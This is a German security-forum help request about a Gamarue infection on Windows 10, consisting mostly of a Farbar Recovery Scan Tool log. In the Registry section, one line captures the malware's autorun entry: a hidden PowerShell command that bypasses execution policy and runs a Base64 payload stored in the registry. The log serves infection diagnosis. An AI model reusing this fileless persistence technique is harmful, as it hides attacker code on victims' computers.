| |
| |||||||
Plagegeister aller Art und deren Bekämpfung: Windows 10 - GamarueWindows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
 |
02.07.2017, 20:01
| #1 |
 |  Windows 10 - Gamarue Hallo, Hatte schonmal tolle Hilfe hier im Forum erhalten, daher würde ich gerne nochmal um eure Hilfe bitten. Seit ein paar Tagen zeigt mit der Windows Defender einen gefundenen Virus an, habe etwas recherchiert und das hört sich recht schwerwiegend und hartnäckig an. Habe Windows Defender durchlaufen lassen und danach neugestartet, allerdings bleibt der Virus bestehen. Habe mir alles durchgelesen, um alles nötigen Informationen parat zu haben, nachstehend die Logs von Farbars Recovery Scan Tool und Windows Defender, außerdem zwei Snapshots der Meldungen. Was fehlt noch? Was wären meine nächsten Schritte? Gruß, Ararat |
|
02.07.2017, 20:02
| #2 |
| | Windows 10 - Gamarue Farbars Recovery Scan Tool
__________________Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 02-07-2017
durchgeführt von ararat (Administrator) auf ARARAT-NOTEBOOK (02-07-2017 20:58:27)
Gestartet von C:\Users\ararat\Desktop
Geladene Profile: ararat (Verfügbare Profile: ararat & DefaultAppPool)
Platform: Windows 10 Pro Version 1703 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: "C:\Program Files\SRWare Iron (64-Bit)\chrome.exe" -- "%1")
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(Lenovo.) C:\Windows\System32\ibmpmsvc.exe
(Lenovo.) C:\Windows\System32\LPlatSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
() C:\Windows\System32\nvwmi64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe
(Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Autodesk Inc.) C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\micmute.exe
(WIBU-SYSTEMS AG) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\InstantOn\InstantOnSrv.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Synaptics Incorporated) C:\Windows\System32\valWBFPolicyService.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tphkload.exe
(Synaptics Incorporated) C:\Windows\System32\valWbioSyncSvc.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Lenovo.) C:\Windows\System32\LPlatSvc.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynFP\Shared\SensorDBSynch.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlkd.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tposd.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\shtctky.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
(Synaptics) C:\Program Files\Synaptics\SynTP\SynLenovoHelper.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Microsoft Corporation) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Lenovo) C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Lenovo) C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.exe
(SRWare) C:\Program Files\SRWare Iron (64-Bit)\chrome.exe
(SRWare) C:\Program Files\SRWare Iron (64-Bit)\chrome.exe
(SRWare) C:\Program Files\SRWare Iron (64-Bit)\chrome.exe
(SRWare) C:\Program Files\SRWare Iron (64-Bit)\chrome.exe
(SRWare) C:\Program Files\SRWare Iron (64-Bit)\chrome.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\ImController\PluginHost\Lenovo.Modern.ImController.PluginHost.Device.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
==================== Registry (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [1804432 2015-12-22] (NVIDIA Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [3486520 2017-06-26] (Dropbox, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [ADSKAppManager] => C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgr.exe [477064 2013-12-22] (Autodesk Inc.)
HKLM-x32\...\Run: [IMSS] => C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IMSS\PrivacyIconClient.exe [1178912 2016-02-25] (Intel Corporation)
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0
HKLM\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\...\Run: [{C2956868-62F6-438A-A9BC-12CB233D69BF}] => powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\BPMJBABA').nhnPLmKgFtez)));
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => Keine Datei
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodeMeter Control Center.lnk [2016-02-23]
ShortcutTarget: CodeMeter Control Center.lnk -> C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeterCC.exe (WIBU-SYSTEMS AG)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Netzwerk Server.lnk [2016-02-23]
ShortcutTarget: Netzwerk Server.lnk -> C:\Program Files (x86)\WIBUKEY\Server\WkSvMgr.exe (WIBU-SYSTEMS AG)
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Hosts: Es ist mehr als ein Eintrag in der Hosts Datei zu finden. Siehe Hosts-Bereich in Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{870c603a-60f8-4e24-9690-e4821fe96d21}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{e862264f-fb30-45d1-a3f9-1bf499d21b67}: [DhcpNameServer] 192.168.2.1
Internet Explorer:
==================
HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.netflix.com/
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2016-02-23] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2016-02-23] (Oracle Corporation)
FireFox:
========
FF DefaultProfile: pnaz2so4.default
FF ProfilePath: C:\Users\ararat\AppData\Roaming\Mozilla\Firefox\Profiles\pnaz2so4.default [2016-03-28]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-08-24] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-08-24] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2016-02-23] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2016-02-23] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-11-05] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-11-05] (NVIDIA Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)
==================== Dienste (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 AdAppMgrSvc; C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe [576904 2013-12-22] (Autodesk Inc.)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-02-23] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-02-23] (Dropbox, Inc.)
R2 DbxSvc; C:\WINDOWS\system32\DbxSvc.exe [49992 2017-06-26] (Dropbox, Inc.)
R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [373744 2016-11-02] (Intel Corporation)
R2 ImControllerService; C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [57160 2017-06-05] (Lenovo Group Limited)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [974632 2016-02-19] (Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [209184 2016-02-25] (Intel Corporation)
R2 Lenovo Instant On; C:\Program Files\Lenovo\InstantOn\InstantOnSrv.exe [3124808 2017-04-28] (Lenovo Group Limited)
R2 LPlatSvc; C:\WINDOWS\system32\LPlatSvc.exe [710144 2016-09-06] (Lenovo.)
S3 LSC.Services.SystemService; C:\Program Files\Lenovo\Lenovo Solution Center\App\LSC.Services.SystemService.exe [273232 2016-06-02] (Lenovo)
S4 McNeelUpdate; C:\Program Files (x86)\McNeelUpdate\5.0\McNeelUpdateService.exe [68192 2013-12-07] (Robert McNeel & Associates)
S3 mi-raysat_3dsmax2015_64; C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64server.exe [86016 2011-09-15] () [Datei ist nicht signiert]
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268704 2017-02-13] ()
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-05-01] (NVIDIA Corporation)
R2 NVWMI; C:\Windows\system32\nvwmi64.exe [3180176 2015-12-22] ()
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-20] (Microsoft Corporation)
S3 SSSvc; C:\Program Files (x86)\SmartSense\SSSvc.exe [124752 2016-03-15] (Lenovo)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [Datei ist nicht signiert]
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [259176 2016-10-03] (Synaptics Incorporated)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [10351856 2016-12-15] (TeamViewer GmbH)
R2 valWBFPolicyService; C:\WINDOWS\system32\valWBFPolicyService.exe [86544 2016-07-13] (Synaptics Incorporated)
R2 valWbioSyncSvc; C:\WINDOWS\system32\valWbioSyncSvc.exe [56848 2016-07-13] (Synaptics Incorporated)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3743648 2017-02-13] (Intel® Corporation)
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
===================== Treiber (Nicht auf der Ausnahmeliste) ======================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
S3 blackberryncm; C:\WINDOWS\System32\drivers\blackberryncm6_AMD64.sys [36360 2016-04-06] (BlackBerry)
R3 e1dexpress; C:\WINDOWS\system32\DRIVERS\e1d62x64.sys [519680 2015-12-08] (Intel Corporation)
S1 hyoidxux; C:\WINDOWS\system32\drivers\hyoidxux.sys [55168 2017-07-02] (Microsoft Corporation)
R3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [244744 2017-04-13] (Intel Corporation)
R0 IntelHSWPcc; C:\WINDOWS\System32\drivers\IntelPcc.sys [88256 2015-06-09] (Intel Corporation)
R1 MpKsl337e8ef2; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{D599F7DF-B321-4635-993D-A80DB39C2EB7}\MpKsl337e8ef2.sys [44928 2017-07-02] (Microsoft Corporation)
S3 NETwNs64; C:\WINDOWS\System32\drivers\Netwsw02.sys [3422472 2015-12-25] (Intel Corporation)
R3 Netwtw04; C:\WINDOWS\system32\DRIVERS\Netwtw04.sys [7630072 2017-03-21] (Intel Corporation)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nvltwu.inf_amd64_c8da725822079174\nvlddmkm.sys [14456920 2017-05-18] (NVIDIA Corporation)
R3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [423128 2013-07-24] (Realsil Semiconductor Corporation)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [51296 2016-10-03] (Synaptics Incorporated)
R1 SMIDriver; C:\WINDOWS\system32\DRIVERS\smi.sys [39488 2016-07-13] (Synaptics Incorporated)
R3 SPUVCbv; C:\WINDOWS\System32\Drivers\SPUVCbv64.sys [749640 2016-07-01] (Sunplus Innovation Technology Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
R2 WIBUKEY; C:\WINDOWS\System32\DRIVERS\WibuKey64.sys [106760 2013-12-18] (WIBU-SYSTEMS AG)
S1 fmqwrnmc; \??\C:\WINDOWS\system32\drivers\fmqwrnmc.sys [X]
U3 idsvc; kein ImagePath
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat: Erstellte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-07-02 20:58 - 2017-07-02 20:58 - 00016006 _____ C:\Users\ararat\Desktop\FRST.txt
2017-07-02 20:58 - 2017-07-02 20:58 - 00000000 ____D C:\FRST
2017-07-02 20:45 - 2017-07-02 20:37 - 02435584 _____ (Farbar) C:\Users\ararat\Desktop\FRST64.exe
2017-07-02 20:43 - 2017-07-02 20:43 - 00001205 _____ C:\Users\ararat\Desktop\windows defender_information log.txt
2017-07-02 20:43 - 2017-07-02 20:43 - 00000873 _____ C:\Users\ararat\Desktop\windows defender_warning log.txt
2017-07-02 20:43 - 2017-07-02 20:43 - 00000424 _____ C:\Users\ararat\Desktop\windows defender_information log 2.txt
2017-07-02 20:37 - 2017-07-02 20:37 - 02435584 _____ (Farbar) C:\Users\ararat\Downloads\FRST64.exe
2017-07-02 20:19 - 2017-07-02 20:19 - 00055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hyoidxux.sys
2017-07-02 20:17 - 2017-07-02 20:17 - 00000000 ____H C:\ProgramData\cm-lock
2017-06-29 23:31 - 2017-06-29 23:32 - 00000000 ____D C:\Users\ararat\Desktop\3D Druck
2017-06-27 22:23 - 2017-06-27 22:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-06-27 21:01 - 2017-06-27 21:01 - 00000000 ____D C:\Users\ararat\AppData\Local\DBG
2017-06-26 12:27 - 2017-06-26 12:27 - 00049992 _____ (Dropbox, Inc.) C:\WINDOWS\system32\DbxSvc.exe
2017-06-26 12:27 - 2017-06-26 12:27 - 00045640 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-stable.sys
2017-06-26 12:27 - 2017-06-26 12:27 - 00045640 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-dev.sys
2017-06-26 12:27 - 2017-06-26 12:27 - 00045640 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-canary.sys
2017-06-20 21:20 - 2017-06-20 21:20 - 00000000 ____D C:\WINDOWS\LastGood.Tmp
2017-06-18 10:32 - 2017-06-18 10:32 - 02373944 _____ (Microsoft Corporation) C:\WINDOWS\system32\WudfUpdate_01011.dll
2017-06-14 20:30 - 2017-06-03 12:15 - 01596600 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-06-14 20:30 - 2017-06-03 12:15 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-06-14 20:30 - 2017-06-03 12:15 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-06-14 20:30 - 2017-06-03 12:14 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-06-14 20:30 - 2017-06-03 12:14 - 01024928 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-06-14 20:30 - 2017-06-03 12:10 - 00130464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tm.sys
2017-06-14 20:30 - 2017-06-03 12:09 - 08318880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-06-14 20:30 - 2017-06-03 12:09 - 01003624 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll
2017-06-14 20:30 - 2017-06-03 12:08 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-06-14 20:30 - 2017-06-03 12:07 - 00923048 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-06-14 20:30 - 2017-06-03 12:07 - 00119712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys
2017-06-14 20:30 - 2017-06-03 12:02 - 02444192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-06-14 20:30 - 2017-06-03 12:01 - 05477096 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-06-14 20:30 - 2017-06-03 12:00 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-06-14 20:30 - 2017-06-03 12:00 - 00321376 _____ (Microsoft Corporation) C:\WINDOWS\system32\capauthz.dll
2017-06-14 20:30 - 2017-06-03 12:00 - 00219040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys
2017-06-14 20:30 - 2017-06-03 11:59 - 01409048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-06-14 20:30 - 2017-06-03 11:59 - 00626528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-06-14 20:30 - 2017-06-03 11:59 - 00311200 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-06-14 20:30 - 2017-06-03 11:59 - 00259400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe
2017-06-14 20:30 - 2017-06-03 11:58 - 21352696 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-06-14 20:30 - 2017-06-03 11:58 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-06-14 20:30 - 2017-06-03 11:58 - 00660384 _____ (Microsoft Corporation) C:\WINDOWS\system32\comctl32.dll
2017-06-14 20:30 - 2017-06-03 11:58 - 00254176 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2017-06-14 20:30 - 2017-06-03 11:57 - 00371616 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 02228120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystems64.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 01854880 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 01693600 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVIntegration.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 01458592 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 00848288 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVOrchestration.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 00846752 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVClient.exe
2017-06-14 20:30 - 2017-06-03 11:56 - 00844696 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntStreamingManager.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 00697760 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVCatalog.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 00672672 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVPublishing.dll
2017-06-14 20:30 - 2017-06-03 11:56 - 00399264 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVScripting.dll
2017-06-14 20:30 - 2017-06-03 11:55 - 02681760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-06-14 20:30 - 2017-06-03 11:36 - 01150784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2017-06-14 20:30 - 2017-06-03 11:35 - 02259768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-06-14 20:30 - 2017-06-03 11:28 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-06-14 20:30 - 2017-06-03 11:26 - 00266640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\capauthz.dll
2017-06-14 20:30 - 2017-06-03 11:23 - 20373920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-06-14 20:30 - 2017-06-03 11:23 - 06760024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-06-14 20:30 - 2017-06-03 11:23 - 00573856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll
2017-06-14 20:30 - 2017-06-03 11:21 - 01516448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppVEntSubsystems32.dll
2017-06-14 20:30 - 2017-06-03 11:20 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-06-14 20:30 - 2017-06-03 11:14 - 03673088 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-06-14 20:30 - 2017-06-03 11:14 - 00443392 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulationExtensions.dll
2017-06-14 20:30 - 2017-06-03 11:14 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmredir.dll
2017-06-14 20:30 - 2017-06-03 11:14 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2017-06-14 20:30 - 2017-06-03 11:14 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2017-06-14 20:30 - 2017-06-03 11:12 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2017-06-14 20:30 - 2017-06-03 11:11 - 02958848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-06-14 20:30 - 2017-06-03 11:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-06-14 20:30 - 2017-06-03 11:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-06-14 20:30 - 2017-06-03 11:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2017-06-14 20:30 - 2017-06-03 11:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2017-06-14 20:30 - 2017-06-03 11:11 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
2017-06-14 20:30 - 2017-06-03 11:10 - 00293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-06-14 20:30 - 2017-06-03 11:10 - 00102400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
